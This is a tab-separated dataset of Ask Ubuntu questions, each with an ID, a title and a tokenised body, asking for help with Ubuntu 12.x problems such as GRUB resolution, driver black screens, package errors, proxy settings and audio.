250818	how can i work around mismatched console resolution ?	i 'm using ubuntu 12.10 on an hp pavilion dm3 laptop , with the nvidia-experimental-310 driver activated . i often switch to a virtual console for certain work . while my laptop 's monitor resolution is 1366x768 , the closest reported by my video bios is 1360x768 . i currently use the following lines in /etc/default/grub to set this resolution : grub_gfxmode=1360x768 grub_gfxpayload_linux=keep this results in horizontal stretching and blurring of the console fonts , which is distracting and headache-inducing . is there a way i can either set the correct resolution , or somehow force the console graphics not to stretch to fill the full 1366 pixels ? i 'm reluctant to use the nouveau driver , since it 's a bit of a performance hit on a laptop . i 've also played around with the uvesafb module , but it shows the same stretched/blurry graphics problems .
250819	how to uninstall windows after installing wubi ?	okay so i 'm not so great at this but i was trying to replace windows vista on my computer with ubuntu . i thought i did this by going through the windows installer but it seems i have the `` wubi '' version which is n't the same thing . i was about to uninstall windows through `` os uninstaller '' but i imagine this is n't a good idea if i just have wubi , right ?
250820	ubuntu wo n't start properly after updating graphics driver	i recently tried to update my graphics driver . it then asked me to restart , which i did . after this however , i reach a black screen and am asked to enter my login and password . upon doing this it says that i have successfully logged in or something and that 's pretty much it . i can enter commands and stuff but i do n't know how to reach the desktop . please help me . : (
250823	what does ./ mean ?	what does ./ mean ? for example : does the following command mean moving files from gapache2 folder to sites-available : root @ ip-10-112-55-203 : /etc/mds-1.2-beta4/sana/config/etc/gapache2 # mv ./ /etc/apache2/sites-available if not how should this be modified ? i tried getting something from google search . but ./ gets ignored by search engines .
250829	i ca n't install the software i want to !	please help , i can not install any software . if i try to install google chrome , this what i get sthabiso @ sthabiso-r519-r719 : ~ $ sudo apt-get install libcurl3 libnspr4-0d libxss1 [ sudo ] password for sthabiso : reading package lists ... done building dependency tree reading state information ... done package libxss1 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libnspr4-0d is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libnspr4 e : package 'libnspr4-0d ' has no installation candidate e : package 'libxss1 ' has no installation candidate sthabiso @ sthabiso-r519-r719 : ~ $ if i install light spark , i get the following sthabiso @ sthabiso-r519-r719 : ~ $ sudo apt-get install lightspark browser-plugin-lightspark [ sudo ] password for sthabiso : reading package lists ... done building dependency tree reading state information ... done package browser-plugin-lightspark is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package lightspark is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'lightspark ' has no installation candidate e : package 'browser-plugin-lightspark ' has no installation candidate if i install gnash sthabiso @ sthabiso-r519-r719 : ~ $ sudo apt-get install gnash mozilla-plugin-gnash [ sudo ] password for sthabiso : reading package lists ... done building dependency tree reading state information ... done package gnash is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mozilla-plugin-gnash is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gnash ' has no installation candidate e : package 'mozilla-plugin-gnash ' has no installation candidate i can not do anything , please help me .
250830	how to make rhythmbox output sound when playing mp3 files ?	i am using ubuntu 12.04 . rhythmbox is playing mp3 without sound . i checked all the devices and all are working fine . even rhythmbox is not muted . how can i solve this problem ?
250833	ubuntu not booting after updating to 12.10	i 'm using ubuntu for a few months , installed on a laptop where i also have win7 , but there are different installations , different drives . today i 've tried my first ubuntu upgrade , from 12.04 to 12.10 everything was ok , and after cleaning old files , the upgrade manager asked for a restart . after the restart i got this on a blank screen : grub4dos 0.4.5b 2011-11-27 , mem : 628k/2485m , end : 35560d minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists the possible completions of a device/filename . grub > and after typing boot i got this error : error 8 : kernel must be loaded before booting i must say that i enjoy ubuntu as os , but i 'm not such a technical guy , so any help is welcome . thank you very much !
250845	how do i know which wwan card is present in ubuntu machine ?	how do i know which wwan card is present in ubuntu machine ?
250846	how to install adobe reader x in ubuntu ?	i want to install adobe reader x ( 10 or 11 ) in my system . but there is no native application available for linux . after doing google i have seen that adobe reader 10.1.14 is given gold rating with wine 1.5.19 . but when i have tried , the installation is going fine without any error , but i could not find the adobe reader in menu . so i have tried it through playonlinux and getting error that `` wine crashed '' . i really need the adobe reader x as adobe reader 9 does not support lots of commenting and writing tools of adobe reader x . please help me to install it . i am using ubuntu 12.10 64 bit . i have tried to install adobe reader 10.1.14 and 11.0.01 with wine 1.4 and 1.5.19 through playonlinux .
250847	sublime text url handler for ubuntu	how can i make sublime text 2 respond to txmt url scheme in ubuntu ? this has been possible in osx through subl-handler and in windows through sublimeprotocol .
250848	eoferror when updating python3	when trying to install python3 this error shows up
250850	unable to locate package texlive	i had a problem with texlive on my ubuntu 12.10 . it could not find setspace.sty and tlmgr did n't work . i googled it a little but i could n't figure it out how to solve it ( i 'm a rookie ) so i removed texlive from synaptic and installed it again from iso file that i had downloaded ( it 's texlive 2012 ) . but somehow it does not work at all now ( pdflatex and etc ) . i checked synaptic and there is no package installed related to texlive and when when i try to remove it from terminal it shows : e : unable to locate package texlive after tring sudo apt-get update it still shows the same error . any suggestion will be appreciated .
250851	12.04 lts black screen after splash screen	today i accepted some automatic updates on ubuntu 12.04 , and after closing my laptop , the screen was black and ubuntu was unresponsive . since then when i reboot i get the ubuntu splash screen and then it goes back to the black screen and i ca n't do anything . i 've tried rebooting it in recovery mode and this does n't help . what steps can i take to diagnose and hopefully fix this problem ? update i fixed the problem , although i 'm not exactly sure how . i booted from the install cd , held shift down to go to boot options , then selected `` check disc for defects '' and finally `` boot from first hard disk '' . not sure why this worked but it worked .
250854	how to redistribute ubuntu ( linux ) ?	i have ubuntu 10.04 lts ( ubuntu/kubuntu and server ) and ubuntu 12.04 lts and other linux distributions . i want to change its backgrounds and packages in the iso image , so when i install it , the modified versions are installed . and i want to redistribute the modified version . i also want to replace the kernel with a new kernel , in the iso . in short , i want to customize ubuntu ( or any linux distribution ) and distribute the custom version .
250856	how do i get a launcher in unity to start an app with a particular command argument ?	is there any way to make a launcher in unity start a particular application with a particular command line argument ? so , let 's say i 've got this application in unity , appfoo , that i could start from the command line like this : $ appfoo but what if i want to start appfoo with some command line argument , like -- do-something-cool ? just as an example , like this : $ appfoo -- do-something-cool more specifically , i want to start chrome with -- disable-accelerated-compositing due to this bug .
250858	broadcom wireless bcm4313 on 12.04 lts	using wireless successfully on 2 dell vostro 3500 laptops . both have failed - second one after update today . sending me here . instead of trying various installs and un-installs - can i simply wait for another 1 month ? will the new kernel solve this issue ?
250861	auto confirm when running bash scripts ?	i am working on a simple bash script that configures new servers how i want them . it 's nothing special but it will hopefully save me quite a lot of time in the future . how do i prevent prompts like this : you are about to add the following ppa to your system : stable version of nginx . more info : https : //launchpad.net/~nginx/+archive/stable press [ enter ] to continue or ctrl-c to cancel adding it when running commands like this from a script : sudo add-apt-repository ppa : nginx/stable sudo apt-get update sudo apt-get -y install nginx is there an auto accept flag that i can set or something like that ?
250862	properly modify home dir	i would like to know , whow to modify properly the homedir of a user . i already know about this command usermod -d /home/peter peter but know , do i have to create the homedir befor ? and what will happen to the old homedir ? ( i know about the -m option which would move the contents , but i do n't want to move/remove the old content ) . so for not removing and just leaving the old content , would i just have to use the command , exactly as i mentioned above ? i use ubuntu 12.04.1 lts `` server '' .
250864	what are = and | in the output of `` ls -f '' ?	i am working on creating a 'cheat sheet ' of shell commands . i am currently researching the ls command and its flags . for the -f flag i know what the majority of the appended indicators mean but for ; = and | i ca n't find any information . could someone please tell me what these commands mean .
250865	can not install ubuntu 12.10	i have a samsung n120 netbook , and for some reason , can not install ubuntu . it says : ca n't unmount /cdrom : device resource or busy ( note that my netbook does n't have cdrom ! ) resetting /etc/default/keyboard even if i wait for 15 minutes , nothing moves . what should i do ?
250869	how can i install ubuntu on a device without a screen nor a keyboard ?	this is tricky . i would like to install ubuntu on a machine that is intended to work as server , and for some reason i do not have an option to connect a screen to it . i expect this may be similar to remote installation . however , there is currently no os on that machine , so i will have to set up everything from scratch . on the other hand , i do have a physical access to that machine . therefore i can get it to boot from a cd/usb . but that 's not enough . is there a way to do such installation remotely ? is there a version of ubuntu image that comes with a ssh server preinstalled , and starts it once booted , so that i can boot the machine with such image , connect to it via ssh and process the installation from a different computer ? if not , what other options do i have ?
250870	why ca n't i upgrade to ubuntu 13.04 using update manager ?	i 'm aware of the how do i upgrade to the development release ( aka . ubuntu+1 ) ? question and this is not a duplicate . on my laptop running ubuntu 12.10 , when running sudo update-manager -d , i 'm getting `` the software on this computer is up to date '' . running sudo do-release-upgrade -d starts the upgrade procedure is it a ( temporary ) bug in update manager which is going to be fixed or is it a change which makes our `` canonical '' answer obsolete ? or am i doing something wrong ?
250874	how to avoid space in filename ?	i have a bunch of files which need to be converted from .mp4 to .mpeg.one . a friend of mine had suggested me this simple script . however it does n't work because filenames contain blank spaces . here is the script : for f in $ ( ls *.mp4 ) ; do ffmpeg -i `` $ f '' .mp4 `` $ f '' .mprg ; done
250875	testing ubuntu mobile applications	i 'm currently reading a lot about the new ubuntu mobile ( phone ) os , and now i 'm wondering if there is the possibility to test applications . i know that qtcreator is the recommended ide and an emulator is currently in the works and will hopefully be available shortly ( see this post by david planella ) . but this emulator is not available yet and the tip to test applications as an ubuntu desktop app seems not to be the best solution to me . the qt qmlviewer also is n't able to emulate the interaction of the applications with the ubuntu os like integrating with the notification bar and the ubuntu dash . so my question is , if there is an extension for the qmlviewer or if it will be a good idea to run ubuntu mobile , which will be released at the end of this month , on a virtual host using vmware or vitrualbox , which will enable the developer to test the look and feel of his/her : -d application within the `` real '' os . edit : found the qtquick 2.0 testcase class which could be used for test driven development using unit tests . edit : the thread about running ubuntu touch on the android emulator is also very interesting .
250887	completely redifine clickpad actions . three finger scrolling . two finger dragging	is there a way to completely remap actions of clickpad / touchpad ? i would like to be able to configure these things on my samsung series 9 900x3c clickpad ( i would pick some of them that are possible to configure ) : bottom right clickpad button click would initiate left mouse button click ( so the whole trackpad means only left mouse button - this would remove the need for tapping in most cases : i could just move the pointer and press down the clickpad ) two finger dragging stuff . this is an alternative for touchpad users to allow easy dragging . in this case putting down two fingers would mean left mouse button click and dragging these two fingers while touching would mean dragging . three finger natural scrolling . to replace two finger scrolling ( because it would now mean dragging ) four finger window move ( to replace three finger ) . currently windows 8 detects 4 fingers while ubuntu does not . clickpad edges to change workspace . the edges of touchpad already working in windows 8 . disable bottom part of touchpad . this is to enable normal touchpad clicking buttons on clickpad so is there any uber geek configuration in text editor that would enable all or at least some of these options ? thanks , aurimas
250894	how to recover calendar after lightning 2.01b was disabled in thunderbird 19	as part of a regular ubuntu 12.04 update , thunderbird was updated to version 19.0 . my lightning 2.01b version was disabled saying it is not compatible with tb 19.0 . ideas on how to recover my calendar will be appreciated .
250899	how to deal with dpkg error while installing battle of wesnoth ?	i get the following error while installing battles of wesnoth : **/var/cache/apt/archives/wesnoth-1.8-data_1 % 3a1.8.6-1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ** i tried to solve it by running sudo apt get install -f. but still i get the same message . i tried to run the game , put sudo apt-get upgrade -f but still no result . so please give me some advice on how to solve the issue .
250900	transfer files from ubuntu to windows xp over wireless	i have a wireless network configured at home . i have a windows xp laptop and a ubuntu 12.04.1 laptop . i have shared a folder on both computers . i am able to read/write files from my windows computer to my ubuntu computer . i am not able to access the shared folder on my windows computer from my ubuntu computer . when i click on the `` browse network - > windows network '' my wireless appears as a folder . if i click on that it attempts to open but eventually fails . i expected to eventually see a connection to the windows computer . instead i get a message `` unable to mount location '' with a sub-message `` failed to retrieve share list from server '' . i suspect this is something rather simple . i am not a ubuntu expert by any means . i am in the process of switching from windows to ubuntu as much as possible ( i think i 'll always have to maintain a windows presence for my wife ) . any assistance would be appreciated . thanks in advance .
250905	eclipse : the color used for text in a content assist popup	i have problem with colour used for the background of a content assist popup . i try to change in the menu window/preferences/general/appearance/color and fonts - > these items without effect : content assist background colour content assist foreground colour i can not get to the right one item had a half a day . please help .
250906	creating a gnome desktop file with custom command	via terminal i can launch application as s particular groupid : sudo sg - nonet nonetmath where nonet is the group name & nonetmath is the binary in /bin ... now i want to create a .desktop file for ease of access [ desktop entry ] type=application name=mathe exec=sudo sg - nonet nonetmath icon= < iconpath > categories=education ; but this is n't not working ... the system is configured such that sudo dont prompt for pswd this was done by editing sudo visudo any help here
250908	how to chat yahoo messenger with empathy ?	i log in to my yahoo account . but after i go to empathy , it just says that `` no online contact . '' how can i chat ?
250910	cross-compilation issues with gcc/g++	i am using gcc to compile a c++ application on my ci server ( http : //ci.berboe.co.uk ) and as the vps that it is compiled on has the x86-64 architecture i need to cross-compile to get the compiled program to work on x86 computers . i have installed gcc-multilib and g++-multilib and several other packages that were suggested in other places , but i still get an error when trying to compile . it is : /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.4.5/libstdc++.so when searching for -lstdc++ /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.4.5/libstdc++.a when searching for -lstdc++ /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.4.5/libstdc++.so when searching for -lstdc++ /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.4.5/libstdc++.a when searching for -lstdc++ /usr/bin/ld : can not find -lstdc++ collect2 : ld returned 1 exit status full logs are available here : http : //ci.berboe.co.uk/job/mcserver % 20linux-x86/11/console any help towards resolving this issue would be much appreciated . edit : /usr/bin/ld : i386 : x86-64 architecture of input file `/usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../../../lib/crt1.o ' is incompatible with i386 output /usr/bin/ld : i386 : x86-64 architecture of input file `/usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../../../lib/crti.o ' is incompatible with i386 output /usr/bin/ld : i386 : x86-64 architecture of input file `/usr/lib/gcc/x86_64-linux-gnu/4.4.5/crtbegin.o ' is incompatible with i386 output /usr/bin/ld : i386 : x86-64 architecture of input file `/usr/lib/gcc/x86_64-linux-gnu/4.4.5/crtend.o ' is incompatible with i386 output /usr/bin/ld : i386 : x86-64 architecture of input file `/usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../../../lib/crtn.o ' is incompatible with i386 output /usr/bin/ld : final link failed : invalid operation i get this after having fixed the previous problem .
250912	texstudio : content-assistant popup window is unreadable	i would like to use this program but i do not know how to display context-sensitive help ( see figure below ) without a black background . i use ubuntu 12.10 and i do n't know what other information might be helpful to solve this problem . thus , the program behaves since installation .
250919	how to change default behavior when ipod is plugged in ?	right now when i plug in my ipod , clementine opens and starts playing , which is annoying because i prefer to manage my ipod using rhythmbox which has a `` sync '' feature that clementine ( afaik ) is missing . once upon a time , in some previous version of ubuntu , you used to be able to change this by going into nautilus âş edit âş preferences , and choosing the media tab . sometime between then and now ( 12.10 ) , this tab has gone away , and i can not find anything about its replacement . this answer on another question suggests there should be a removable media menu in system settings , but this is also missing for me . any idea where the removable media menu ( or its equivalent ) is located in 12.10 ?
250923	evolution in 12.10 painfully slow	since upgrading to 12.10 and what is presumably a newer version of evolution ( i never checked on 12.04 ) i have been having serious and annoying problems using evolution . just reading emails can be painfully slow . when i open evolution for the first time , it is unusable for several minutes using 100 % cpu and just displaying the message : retrieving message ... .. until it finally displayed the message it is on . after that the inbox works ok . however , if i try switching to another folder or searching , or using a search folder , the same result . i have to wait 4-5 minutes ( no exaggeration ) either for the result or for it to display the first message clicked on . again , once it has done all the message load immediately when clicked . it seems like it is trying to load all the messages in the folder at once , or re-index them all again every time i click a folder , rather than just having a slight delay when each message is clicked on , like it used to . also if i click send and receive , the same thing happens , it hangs using 100 % cpu but invariably either crashes or needs to be killed without ever completing a send and receive , ergo the send and receive button is useless to me now . none of this happened in 12.04 , or indeed in any other version of evolution that i have used for the best part of a decade . it was always smooth , fast and reliable . is there a way of getting evolution to work the way it did in 12.04 ? i.e . load messages as required rather than re-loading the whole folder each and every time i click on that folder . or is there an update or upgrade not yet available in the repos that can restore this once brilliant piece of software back to being usable again ? i am using ubuntu 12.10 , evolution 3.6.2
250926	why does my hp printer not work with the new version of ubuntu 12.04 ?	ever since i upgraded to the newest version of ubuntu ( 12.04 ) i 've had several issues with my hp deskjet 6300 all in one fax/scanner/printer . the fax and scanner work fine but the printer does not . most often , i can print the first page of a document but then it freezes into the second page .
250927	contents of grub menu on booting	i installed ubuntu 12.10 alongside windows 7 in a different partition . then i formatted the partition where windows 7 was installed.now i want my grub menu to display only ubuntu for booting . but it is also showing windows 7 . is there any way i can clean grub menu to display ubuntu only not windows ? ?
250929	pythonpath environment variable	i have this in my ~/.profile : export pythonpath=/home/dev/python-files in the python-files directory , i have a few projects cloned from git-hub ( flask , curveship and py-vgdl ) . whenever i try to start up any of the examples in these projects , i get errors similar to the following : $ python ~/python-files/py-vgdl/examples/gridphysics/frogs.py traceback ( most recent call last ) : file `` /home/dev/python-files/py-vgdl/examples/gridphysics/frogs.py '' , line 67 , in < module > from vgdl.core import vgdlparser importerror : no module named vgdl.core it seems to me that i should n't get this error because i have that pythonpath environmental variable set up ? running the python interactive interpreter : > > > import os > > > os.environ [ `` pythonpath '' ] '/home/dev/python-files'
250930	ubuntu 12.04 login screen finite loop and keep end my session	the difference between this issue and other threads about : `` login screen loop '' is that in my case it 's a finite loop which means it runs five times and then i can type my password and start my session . ( i 'm not stuck in loop at the login screen ) check my video . after my session start ubuntu randomly log me out ( i can see the ubuntu crash dialog box ) . it happened frequently when i was using nautilus with dropbox applet opening tabs and saving in text files but also when i was just using chrome . deluge torrent is ending randomly and i 've seen the ubuntu crash dialog box too . it seems that started after my last update about two days ago . full update history.log file i tried : sudo dpkg -- configure -a ; sudo apt-get update ; sudo apt-get upgrade and restart also : sudo apt-get install -- reinstall xorg and restart [ important ] since i ran that last command to re-install xorg yesterday ubuntu seemed stabilized ( for 24h ) until it logged me out today . it kept randomly ending my session and going to login screen finite loop until i decided to run sudo apt-get install -- reinstall xorg again and restart . so i think this issue is related to x server and/or my graphic driver . since it started last weekend after an update i began to search inside my history.log ( $ gedit /var/log/apt/history.log ) for some package related to xorg or xserver . i found xserver-xorg-video-intel version : 2:2.19.0-0ubuntu1~xup1 and decided to update ( or downgrade ) it . my vga is : $ lspci -vv 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 3658 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 43 region 0 : memory at d0000000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at 5050 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 i change my server mirror and ran : $ sudo dpkg -- configure -a ; sudo apt-get update ; sudo apt-get upgrade after that the last version change to 2:2.21 : $ apt-cache show xserver-xorg-video-intel | grep `` version '' version : 2:2.21.0+git20130204.9640640a-0ubuntu0ricotz~precise version : 2:2.19.0-0ubuntu1~xup1 version : 2:2.17.0-1ubuntu4.2 version : 2:2.17.0-1ubuntu4 at last i re-installed xorg : $ sudo apt-get install -- reinstall xorg but without too much luck . yesterday the session was taking more time to crash but today is crashing all the time . i 'm going to change the xorg version and see what happens : $ apt-cache show xorg | grep `` version '' version : 1:7.6+12ubuntu2 version : 1:7.6+12ubuntu1 p.s . similar threads : why is my ubuntu damaged after updating xserver-xorg-video-intel package ? 12.04 login loop - gnome session crashes back to login - ubuntu keeps ending my session - unity spontaneously logs out in ubuntu 12.04 - login crash loop
250932	when i start my camera in video call on skype 4.1. incoming video is flashing blue ?	i installed ubuntu 12.04lts trough wubi on win7 . later have installed skype 4.1 . when i make a video call i can hear and see the other person fine , but when i start my camera , the image of the incoming video call starts flashing between blue and normal video ( the same for my mirror image in the little square ) . the other person sees me fine . i use intel 82852/855gm integrated graphics device if that is relevant anyhow . i found that people have same problem , but solution is found . more information in skype bugs on launchpad .
250943	no launch/menu bar . can only open terminal	i logged into ubuntu and my menu bar and launch bar are gone . i can not use ubuntu as there as the only this i see is my wallpaper . i have restarted and it has not done anything . i can open the terminal , and i can run commands , but that is all i can do . here is a picture of my screen with the terminal open ( sorry for the bad quality . ) as you can see i do n't even have the ability to close , maximise or minimise windows ( i can close by using alt+f4 though . ) i have tried various command like alt+f2 and other commands , but these do n't appear to work . is there a way in the terminal to open the home folder as a window ? if i can have a folder open , then i can at least use ubuntu to an extent . thanks in advance .
250952	samsung np305v5a power adapter stops working at boot screen , shuts down unexpectedly while running	i am new to ubuntu . i have installed wubi.exe for 12.04 lts on my d : drive . problem is when the login screen comes up at booting , my power adapter dies . if i unplug and plug it again immediately , it does n't work . it only starts working when i plug it back after like 5 minutes . another problem i am getting is my computer heats up a lot while running ubuntu . and after running for a while it shuts down unexpectedly . i am not sure if it is for the temperature sensor , because i did install lm-sensor the last time . still it crashed . my laptop is samsung , windows 7 , processor : amd-a6-3410 apu with radeon ( tm ) hd graphics , 6gb ram
250954	chrome and firefox not loading flash plugin ( could n't load plug-in )	this just started happening on both , chrome and firefox , the flash plugin simply does not work . here is an image : i tried changing youtube to the html5 mode with no luck . tried reinstalling the flash package or the ubuntu restricted package with no luck . tried disabling the plugin just in case in both browsers and then enabling it , no luck . this is affecting both 12.04 , 12.10 and even 13.04 . tested on firefox 18 and 19 and chrome 24 and 25 .
250960	sound is unbalanced on both speakers ! i am hearing loud sound from the left and low sound from the right speaker	i have checked with other headphones , and my small 2:1 home theatre also complies the existence of the problem . moreover when i check my sound system through pulseaudio `` test sound '' utility , i can see there are six buttons shown , whereas i should only have lest and right buttons as i have 2:1 home theatre ( connected on the rear audio port ) and a normal headphone ( connected on the front side ) . i also have jackd installed and configured to run along-with pulseaudio . on the screenshot you can see jack sink is working with five output ports where i should only have front left and front right .
250963	after login it takes 10 seconds before unity shows	i installed compiz-settings-manager and then the extras plugin . the only reason i did this is so that i could 'put ' an application/window to my other monitor . that is the only thing i changed . however , i noticed now that after i type in my password at the login screen and hit [ enter ] it takes longer . it used to be pretty much instant . now , i see my background right away and then it sits there for at least 10 seconds then the unity launcher shows up . i have since purged both of the applications i installed . i then ran some 'reset ' package i found online that did n't seem to really do anything . i am still having the same problem . does anyone know how to fix this ? it 's just one of those little quirks that is really bugging me mainly because i know it never used to do that . i really do n't want to have to re-install ubuntu . thanks
250966	ca n't boot my ubuntu 12.04 machine ; displays error on start	i am running ubuntu 12.04 running cinnamon desktop . i tried to reboot , and now i get an error and the system halts . the error is : > starting nanny ( parental control daemon ) : > /usr/lib/python2.7/dis-packages/gtk-2.0/gtk/__init.py:57 : gtkwarning : > could not open display warnings.warn ( str ( e ) , _gtk.warning ) > ** ( twistd:2023 ) : warning** : command line'dbus-launch -- autolaunch-0e42ec90e8137a7c8d6a1cc00000005 -- binary-syntax -- close-strerr ' exited with non-zero exit status1 : autolaunch error : x11 initialization failed.\n when i try to go through recovery , and remount the hard drive as read-write fsck runs and just stops . any ideas ?
250968	feasibility of static binaries	i am trying to figure out the implications of a distribution where static binaries are preferred over shared ones . for that purpose , i put together a small scala shell script that 1 ) traverses /bin , /sbin , /usr/bin , /usr/sbin directories , 2 ) locates non-symlink executables , and 3 ) sums the file size of the libraries listed by ldd . is this a feasible approach to compute the extra space that would be needed ? further , besides extra disk space consumption , what would be the runtime memory usage implications ? that is , binaries compiled against the same shared library will let the kernel to instantiate the shared library just once at runtime . in case of static binaries , each binary will need to reserve extra memory for the very same library . with enough swap space , would still that be a problem ? ( after all , is n't that how most of the user-space windows applications run ? ) are there any other potential implications that i might be missing ?
250970	error while recording a rtsp stream with avconv	i need to losslessly record a rtsp stream of an axis 211a camera using avconv on ubuntu 12.04 . i am using this command : avconv -rtsp_transport tcp -f rtsp -i rtsp : // < ip > /mpeg4/media.amp -acodec copy -vcodec copy -y output.avi it works most of the time , but sometimes i randomly ( or so it seams ) get an error that stops the recording after about 2 seconds : application provided invalid , non monotonically increasing dts to muxer in stream 1 : 26158 > = 21471 av_interleaved_write_frame ( ) : invalid argument obviously i need this to work 100 % of the time , so if anyone has a solution to this it would be great . i 've been looking around , apparently many people had a similar error but i ca n't seem to be able to find a solution . thanks , g .
250971	`` no such file or directory '' error while using npm	i installed node and npm using the instructions provided here i was able to use node successfully . however , as i attempt to install the `` formidable '' node module , i get the following error : $ npm install formidable bash : /usr/local/bin/npm : /usr/local/bin/node : bad interpreter : no such file or directory when i do a which npm i get the following output : $ which npm /usr/local/bin/npm i have no clue on what is wrong with npm here - any idea on how i can fix this ?
250972	need help to find/install up to date ati drivers for kernel 3.5+	gpu : radeon hd 5450 distro : ubuntu 12.10 attempting to go to the amd website and filling out the relevant information gives me this , however these drivers are incompatible with kernel 3.7 and when attempting to install them i get this error : error ( dkms apport ) : kernel package linux-headers-3.7.0-7-generic is not supported error ! bad return status for module build on kernel : 3.7.0-7-generic ( x86_64 ) i 'm more than willing to provide any info that i am missing . thank you in advance .
250974	any app or script to download wallpapers from different websites	i have found an app love wallpapers hd , which working in ubuntu-tweak , it is good but there is no settings or option in that app . but i need an app which can change wallpaper and also download from different websites , like tumblr or deviantart . or if there might be a script which can do that . thanks
250977	wireless network connection	wireless option not showing up in network , or additional drivers . dell inspirion 220 with ubuntu 12.04 lts network card identified in terminal : product : bcm 4318 ... configuration driver=wl latency=64 have attempted to install b43 firmware update . still no connnection option . new to ubuntu , old hat at mac/pc kat
250981	how do i configure spice with kvm ?	i 'm running ubuntu 12.10 and i have installed kvm . trying to install / configure spice but not having any luck finding sources that work . has anyone done this yet ?
250982	network does not work in ubuntu or linux mint , works in windows 7	i have no wired or wireless connectivity in ubuntu or linux mint . i have tried gnome and kde versions of both . networking works in windows 7 on the same machine . in the ubuntu 12.10 network manager ( in the control panel ) , i only have two items listed on the left : `` wired '' and `` network proxy '' . `` wired '' only says `` cable unplugged '' and my mac address . the options button is not clickable . the only interface i could add in this menu is vpn . this is my output of ifconfig -a ubuntu @ ubuntu : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00:1e : c9 : xx : xx : xx up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:432 errors:0 dropped:0 overruns:0 frame:0 tx packets:432 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:35296 ( 35.2 kb ) tx bytes:35296 ( 35.2 kb )
250983	install ubuntu 12.10	i have ubuntu 12.10 studio and i want to install normall 12.10 from memory stick , but the boot menu does n't show up as it did on windows 7 ... grub does n't show it as well
250985	ubuntu 12.04 lts and rtl8187l problem with connection ?	i have installed ubuntu 12.04 lts and my airlive wl1700usb wireless card connects ok to access points , but there are big variations in speed . sometimes it is 200kb/s then again only 10b/s and so on . i 'm using college internet with no key set on ap ( open connection ) . they have 10mb/s speed and on win7 my internet is very fast but on ubuntu it just does n't work correctly . i tried it at home too and same problem . could it be a driver problem ?
250990	using nx server securely ?	recently , i built a computer running ubuntu and gave it away to a relative . i 'm willing to give them it support for free , but they live 50 miles away . the solution ? a nx server . i setup the node , client and server on her computer , with the client only on my computer . it 's working out fine , but the only fear i have is other people accessing the server . i want only a few computers to be able to access the nx server , and nobody else . how do i go about doing this ? by the way , both computers ( relative 's computer and my computer ) are running 12.04 , with a few computers that may access running centos 5 .
250991	what happened to the leadership code of conduct ?	i 'm trying to read and perhaps sign the leadership code of conduct , but all i can find is this : ubuntu code of conduct v2.0 back when the code was in version 1.1 , i could access the `` regular '' coc 1.1 and the leadership coc that went along with it . the code of conduct is now on version 2 . where is the corresponding leadership code of conduct ?
250996	how to completely remove thunderbird ?	since i prefer to use evolution , i would really like to completely remove thunderbird from my pc . i already performed sudo apt-get purge thunderbird* but locate thunderbird still lists some hits ! how can i completely remove it ?
251003	how to permanently disable http_proxy	when i remove proxy from system/network and apply it system wide it still remains when working in console . when i run : env | grep proxy it prints : http_proxy=http : //proxy.studnet.lan:8080 ftp_proxy=ftp : //proxy.studnet.lan:8080 socks_proxy=socks : //proxy.studnet.lan:8080 https_proxy=https : //proxy.studnet.lan:8080 i could remove it with : unset http_proxy unset ftp_proxy unset socks_proxy unset https_proxy but it 's not permanent , when i reopen terminal these proxy variables are again setted . how to remove them permanently ?
251005	get black screen after small kernel update ubuntu 12.04	so i dit an update of ubuntu 12.04 today and after i restarted the pc i get a black screen and i ca n't do anything . the updates seemed like hotfixes for the kernel update size 8kb and during the installation i saw that ubuntu tried to activate the 304-310 beta nvidia driver . any way to solve this without reinstalling ubuntu ?
251009	how can i enable brightness control on my imac 11,3 ?	i have apple imac 11,3 ( 27 '' led , purchased in 2011 ) with a radeon hd 5750 graphics card . when i installed ubuntu 12.04 lts , everything works fine except brightness control . i want to mention that i did n't install any additional driver . i tried sudo update-grub after changing /etc/default/grub by acpi_backlight=vendor with/without acpi_osi=linux . nothing changes . what can i do to fix this issue ? help is appreciated .
251010	are drivers for 3dconnexion devices included in freecad/paraview ?	are drivers for the different 3d cad packages ( freecad , paraview , etc ) included in ubuntu for 3dconnexion devices ?
